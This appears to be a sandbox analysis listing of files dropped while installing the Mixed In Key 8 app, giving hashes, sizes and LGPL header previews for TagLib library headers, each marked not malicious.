Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_QMUCR8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	4.292600596513896
Encrypted:	false
SSDEEP:	96:CzjbYskiAi/iZlMpw+ST4eezyRaK++GUsCAqsmA8IJ:m8skiAi/iZapw+84XzyRn++GJCAqsmAv
MD5:	7C8D436FAB4778D83156409DA0BC0E0D
SHA1:	92ACBA206D033CABB1C88A353BDBE18CB9546517
SHA-256:	1F37E6D61C85BB80C6DA9CD9D698046729DCDAA924F45D6964A547763334DCC0
SHA-512:	F06200B61AAB9DFF407E6F88C72F4999C2A26C0DEB0F3A507235994188F65609001B7F7A52CACC58E1BC30DA3C578F65946B3C50481A82EC7032821AE9B23D11
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2006 by Luk.. Lalinsk.. email : lalinsky@gmail.com.. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A P

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_QXU1Sg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2863
Entropy (8bit):	4.335270998280833
Encrypted:	false
SSDEEP:	48:F3TyBHbKjPOLSlylyqMX5/PPkcf/mJKf/Opcf/siJKf/T3/syRx4h+G:FCb6KAJH8cfeQfmpcfNQf73ZG
MD5:	A3EEF9D704DCF5075AFC92358A6E07B5
SHA1:	4186DCDA26FF431F601901AD62A2B3A0AA961D7F
SHA-256:	05ED2DCAAF8DF2DBDD4B5CEB80B105BEBDEBA8A4B5A66D607C445CC50616E3EF
SHA-512:	FB4E95EA0F72EC0F5E6BDF654015187DC995CDDC47B1862C31B67FB5172EDC20ADCBB5A013F111701CF9FD3FCF4E8AD68300E2BB56D0CDBA888D110EB2325330
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2010 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_QtlZvC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2704
Entropy (8bit):	4.746935736262327
Encrypted:	false
SSDEEP:	48:KzyBHbKbx27ShfbJnUfSBQpipvn5/cW3M5Ts:KSbV7Shfb+fSBQp+8a
MD5:	ED9816BD305FBC82BC2B42986AD0F579
SHA1:	275EEC4715DE630CDE100EF37C44707E5F1AB230
SHA-256:	EB937EFD3B2EA112F79C2CE9842179010A5E9DC9AC27035DBA8B1A20CF85CE77
SHA-512:	E60582B8E0CA32A64DE72126F538A38D0BCC3E1FC172AD83DE9FCC6BD628B094C5EE11F9F0646619392C635866A2A1D396E73F53CA9580ECCE65DAD47A1A1324
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_S7B093 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	8035
Entropy (8bit):	4.3977045475678604
Encrypted:	false
SSDEEP:	192:iu5PqxEoZVjqqSNY4bJazbJbzOfo8M5bDmodnyfmVjS2HcijYAf4:iuhbJwJMmbKoU+XKB
MD5:	618CA3BDBBB7F39259CB0988644210D9
SHA1:	3D0D05DE9D19D32C294198D368F8591F33699DD9
SHA-256:	F65DB1B9330BECBD9A89D36063F18373678D431DEA500A674A72A66CBC78512A
SHA-512:	ADAE306F283728D1044EF044DD65ACF4FBF936FECC1737ABF4CEB0A69851331358F20530C7517D92E474F29DBB250016473F4298800710309B8B44C4634FA2F7
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_T7eFcw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4158
Entropy (8bit):	4.260274274969449
Encrypted:	false
SSDEEP:	96:KybBmzeMkCCczCMk6/1cKqwzJImzJRz5NJFq8R:19mZjRSKqwzJImzJRz5N3qE
MD5:	B3903442177BDCD266606E7CD6FCD5DD
SHA1:	747A7A7B188DF24E735E833973E66028EE49649C
SHA-256:	4C1D8D310BE760FEC95D6BD49912199EBDBBBF8BC0AFD2705D26C996B6AB305C
SHA-512:	993333EDD3C3BE09E28171FCCE843D6FC0C4DE41E13C498C6DEF7DD23ECA3A150FC3546589EF161FA40509B6EA2C4CF119EDA31379B211A4E7F2F4672C218478
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_UYcWd4 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5858
Entropy (8bit):	4.316842403938969
Encrypted:	false
SSDEEP:	96:kob57PbhjqDyWYHVjYOSVFBGOwfXzvAUOSUXTQy+eFDT47sbDFU0nCAmbAX1GVT2:LF7tjqDyWYHVj4jBsIcUXTQy+GDT4o+6
MD5:	25774740C4142C301425E1EC8D902232
SHA1:	BE5C000FBE0B66C9A077ECE0283A8065722D70D5
SHA-256:	CE1685D9CF5FBC4EB7F67F924CE859DB5703500EABDB246F65592A148877ECD2
SHA-512:	51203765870BCD2D5474DE4E5743F7E2E6BDEDA227ACE061EE67CBE585DAE0F693BCD1B043AAE2CB27BD21C13978FB3476F592388A2E6FAC5A3C20386630F55A
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_X6YA5M Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5142
Entropy (8bit):	4.386713157750963
Encrypted:	false
SSDEEP:	96:mJb9m+iWi0GylMpw+ST4eezyR9++G+kj5dLUHtL9D39wTX7:iRm+iWi0Gyapw+84XzyR9++GXFdLUHtg
MD5:	CB74E43BF94968946BB996DB512561E1
SHA1:	37BB5BB688D46B1741D48213E233B9CCDD258257
SHA-256:	0681E752E19D220B3CE0B6F0D5D6AC432976176EAC77ED83D55459C30F22786E
SHA-512:	23BB23FA2982F3440717D7DCE558DE0E4062D1C2B598BEFAE726F8E6EDE975DCF5220559E434702BF2F3882D3F8E69630651BC43573BE7985942EE2EE338CB5A
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_XBuy39 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3637
Entropy (8bit):	4.345992187552828
Encrypted:	false
SSDEEP:	48:ktTyBHbKjPOLz70Y/S9THI/xVM/aVrp/pJuqlyeSQ4ta/rpZwkt0//dKM:kobD7RK9TIrMslxEqlyDQxzpZBiHdP
MD5:	761D5D4C6C79A649882E093E5C9DFD72
SHA1:	0620664929E8107434E078E6077D6B9D3DB81598
SHA-256:	7DDA0B385865C6DD08BEEA56DA568B882B2886F9D7E1EDF5EC69332C702AB78D
SHA-512:	32089FD746820899E7659DA4FD6543AED9810F6A07AAB78F6B0A150F5EDB975E22C24F3ECDC85380E3367B3EF81823EF2C8585938288A965B5077160D9789593
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YAVI4W Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	16171
Entropy (8bit):	4.475375878007668
Encrypted:	false
SSDEEP:	384:LhgjxgRa9MlRQnwFEXNydJHAOJGPYGoXJvp:LhoxuQoEXanGo5vp
MD5:	60C30E9F428EAD6208F60443F13488BF
SHA1:	5CCCE1D4A83BB45365CA1CE6D9CDB02D76DD452D
SHA-256:	B61071AF5A99E54AB5D1E7A3FFB2E78A32B7823E32BF912286723E58F9336FA6
SHA-512:	733100C9FAF4BCE36EDE0F6377B3435D0B7F1A0492FD22ECB8674329052E877D4264FC2A8AAD5D2B348C88C19270356D57A5A9D36A101CDC943D7D7CB9EF2281
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YLkrs1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7473
Entropy (8bit):	4.869416007568782
Encrypted:	false
SSDEEP:	192:Lm8dy4jCfcS/NJM6RFMANEETkDgbCHwtN+ZJbCTp:Lm8dy4jCf1/N+IMANtkDgbq4NkgTp
MD5:	7993B67B429E5A392827472A38F99813
SHA1:	F2E524DB046538FC37080FC577E2CDA53D885887
SHA-256:	0C718E1BCDB2B3474094C3EE309C69F528FC97AB904A0669F10C9ACF31906893
SHA-512:	0D1DAC1FB73B054A74AB662FE0074194A553E1DDE63545B599A58BBD153BEDF9FFDE8EF60BCA7298D465AF8F68B214B6F37BA2485C9276A563A404A68B9E3FE5
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_a5pzG1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3607
Entropy (8bit):	4.266974725317283
Encrypted:	false
SSDEEP:	48:rnLTyBHbKjPOLCme+z/eCi2M/v9GulM/YtT/yCr/OU/siJfr/tU/lbz/ewqfVwmt:rGby2zXiFHFlMAJ662UN1VUdbzk
MD5:	15064C4A068F80E42FC60F9AA1C30EA5
SHA1:	C723031428B7450C2F21DE87A17A382213D80EB5
SHA-256:	132C80B42154FC51582CB68EAB00D8D174C8B05504EE769E9859F51BACBCDBED
SHA-512:	3115068D95BEA54EB9AAD6BE431F0B477768287C1C52DF59B21F522B446098ED054654894B176B546A1B3E2C78A1C9EC714AEBE3723E11CCA69EC843ECD67B82
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2008 by Serkan Kalyoncu. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. *.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_aezekX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	4.26298734487071
Encrypted:	false
SSDEEP:	48:/WTByBHbKjPOLspfhldXZ/z/+d/CeGulM/pm/0bz/Se2ew6:+TMbShLpSdK0lMxmcbzj
MD5:	944D92E76678BC7E62D8DEF41702142D
SHA1:	77199FD99CBDB8E7EFDB8619C2A9D1CEE47403AC
SHA-256:	9C1921B262F450521E22B48EFB54428DA8EF18D4E6739A4BBDCD588F6BB43FDE
SHA-512:	70662F01F8C968500E2606535B9753552E11062E4C9E124112F40DBEE302F22DA044AE4B5ED571956C8C6F3FDB6B8726D4C0C6219360925DBBE875F572A77883
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2015 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bJjidk Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	3841
Entropy (8bit):	4.30245775758812
Encrypted:	false
SSDEEP:	96:KSbeL+3MkCCcNMk6/1cKqwK0mSmzrXJzmR:966uj8SKqwDmLzrXpS
MD5:	7A912AC1C8A440AD9C6AAE78FD36D2A0
SHA1:	1FEB2D29CED2CEFCA540A7698260621BE3011DCC
SHA-256:	2CCC19BD942573E638BF20288943B3417FC6BE3B20B36284AD0867DD8527E87D
SHA-512:	8785741DC1D0E8BB9D691BF4BE0437FEC3EB551439863C7B73FCF64FD8246EC00361142D8404CE25A94BA7C74D11C5E5CE75F18F4D91830D3F6DFC1011BA6604
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bN1XbU Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	4.173402861840568
Encrypted:	false
SSDEEP:	96:tH/bFTmy3cFlk5AWaDQ2mTSBgkZhm+utp79Z23C:JpTmy3cFi5AWcQfTSBDhm+uH79Z23C
MD5:	EC4A4F86112DF9D5C7422A3A8576CF86
SHA1:	ED99B33A312A8D198FC7F3F2371D5D338F70CDE0
SHA-256:	85C02A960AE868A6B1A5C9F5FC6D8883C8624D9C75044E90C66B7E9BBA9B08C7
SHA-512:	AD75924694E495875519BCA5DB0B7454F5B9FCC37F305FFBBAA63E9C7BB9ACEAC993E463E6F7AD7D136F080B36B1E3F2ECF4450AD3393130573232B2077F8D4A
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2012 by Luk.. Lalinsk.. email : lalinsky@gmail.com.. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. (original Vorbis implementation).***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A P

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bhweV1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	18879
Entropy (8bit):	4.413817636238626
Encrypted:	false
SSDEEP:	192:LvcujqO5oXCZwaFQFQxOivDLsEZ17nExV1dV4sZ9FGj5RIUm1oLICn/WVu7/kHfB:L4riDfZE5SCBkQeI3OUZdmzZphS
MD5:	AE8DB772E90E8F98342C598F11F54CD0
SHA1:	840FDC6ABF2192D5A9DCF58DF04199A079564835
SHA-256:	C5BF37F679D4DF81FF5E2F29FD77372CBD52235B885135DD00F63B934734E8E3
SHA-512:	8389F95D66EAA1F09A510D7D68D3BBAEB9CF18D006F4C9A26A119934CB7D495C5A6E9BC581DA883157472CA43A7F5F2ADC3A91AC926555E7F4ACA1887B6A40B3
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_cGuskV Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4584
Entropy (8bit):	4.269561378781429
Encrypted:	false
SSDEEP:	96:kobODjiDk5DlMpw+ST4eezyR9++Gsu/VvdIeYA2dqtGInMn:LajiDkNapw+84XzyR9++Gsu/VvdIeYAi
MD5:	DE02255238842F4B49FCDB573AD0F0A2
SHA1:	72A05A13BA6F5253875CFC8354DD260C8AFA0EED
SHA-256:	020697064B8AF1C2CF64A0D19FD0E8EE02755632F85B686C39EF130FA86D7042
SHA-512:	AE0BF33DA74AD130719EFEBB70507574AA0BEEE4848DCA7D9656B6F17CA74996D37D2FBD7C3B9190DBF67604FC0760C17CB96EE64961522BE2860464955860A1
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_cTUBdZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5101
Entropy (8bit):	4.366160158086051
Encrypted:	false
SSDEEP:	96:kob8/6y4Xo5kIyBlUQdfMqsILHAetPy30QQFh6+/a0vfOEppeyycMsIvitFrkqQ6:LQ/B48kIyByQdfMqsILHAetq30Qah6+v
MD5:	877E9CCD412CB78CC72E583D50EF3C1E
SHA1:	0B44FA96C817A055D8940BE860E650BA1732C6D4
SHA-256:	ECDB978E0EAFF853EEEB6B1A28AA6099B38D78DE20AE1A96CCBC07845807487F
SHA-512:	84F426F7B59EB0C94F1A22E10DDDF5520E47F85DE96046E793426F69AF171155A5B0A5F0BE7C1BC4C504FDD22054C3217438FA7875EC1102325CBD2380B2F80A
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_d3NGLQ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7369
Entropy (8bit):	4.625451404861965
Encrypted:	false
SSDEEP:	192:hiuHlInNEUNgB5NO8gAbYPu9yr9yBxI7KV66n4mfFOAusDujAr+Aih9OxWZRQL:hiuFInNECgzsLtE6lKF6O
MD5:	B1AA362EC5310017ADAF0F8002BEC531
SHA1:	072FEC0E11B3183E70D4CD4CE2B76E3F24AB8C78
SHA-256:	250F793B6BAB6DA484D7B080AD5994880C591C89BCD9F8A5E955F47010E5ECE8
SHA-512:	8A6026B367C49C5CB81069E7E30E1B38BB4BB0E954F307913BB3479EF7CDC0CEA74A747620A50AD606E2F95430C5F13261988D6F0F54A508C46F2105156B33E4
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2012 by Michael Helmling. email : helmling@mathematik.uni-kl.de. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eGPGs9 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3849
Entropy (8bit):	4.382512488472104
Encrypted:	false
SSDEEP:	96:kobdJ9adc8DR/zd7Tkq/lUQeujNYNuWWal6vtP2D:Lf9ai8VzFTkoyQeujGN1WalMJ2D
MD5:	6C190AB2DB365D1D347ABF3DF8BD7DB7
